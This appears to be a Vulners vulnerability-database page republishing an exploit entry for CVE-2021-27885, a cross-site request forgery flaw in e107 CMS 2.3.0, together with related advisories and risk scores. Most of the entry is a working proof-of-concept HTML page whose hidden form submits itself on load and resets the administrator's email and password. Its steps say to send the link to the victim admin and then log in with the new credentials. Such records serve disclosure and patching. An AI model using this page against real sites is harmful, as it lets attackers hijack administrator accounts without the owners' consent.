Vulners
Lucene search
e107 CMS 2.3.0 - CSRF
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | e107 CMS 2.3.0 Cross Site Request Forgery Vulnerability | 4 Mar 202100:00 | – | zdt |
 | CVE-2021-27885 | 2 Mar 202122:44 | – | circl |
 | e107 跨站请求伪造漏洞 | 2 Mar 202100:00 | – | cnnvd |
 | CVE-2021-27885 | 2 Mar 202118:15 | – | cve |
 | CVE-2021-27885 | 2 Mar 202118:15 | – | cvelist |
 | EUVD-2021-14622 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-27885 | 2 Mar 202119:15 | – | nvd |
 | e107 < 2.3.1 Multiple Vulnerabilities | 3 Mar 202100:00 | – | openvas |
 | e107 CMS 2.3.0 Cross Site Request Forgery | 4 Mar 202100:00 | – | packetstorm |
 | Design/Logic Flaw | 2 Mar 202119:15 | – | prion |
10
# Exploit Title: e107 CMS 2.3.0 - CSRF
# Date: 04/03/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://e107.org
# Software Link: https://e107.org/download
# Version: 2.3.0
# Tested on: Windows 10
# CVE : CVE-2021-27885
CSRF vulnerability on e107 CMS
## Bug Description
Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.
## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF login POC using the following code.
```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
<form method="POST" name="form0" action="
http://localhost/[path-to-e107-cms]/usersettings.php">
<input type="hidden" name="loginname" value="admin"/>
<input type="hidden" name="email" value="[email]"/>
<input type="hidden" name="password1" value="[password]"/>
<input type="hidden" name="password2" value="[password]"/>
<input type="hidden" name="hideemail" value="1"/>
<input type="hidden" name="image" value=""/>
<input type="hidden" name="signature" value=""/>
<input type="hidden" name="updatesettings" value="Save settings"/>
<input type="hidden" name="_uid" value="2"/>
</form>
</body>
</html>
```
2. Replace the email and password with the valid credentials.
3. Send the link script to the victim (admin) to make them click.
4. Login with new admin passwordData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2021 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.8
CVSS 3.18.8
EPSS0.00184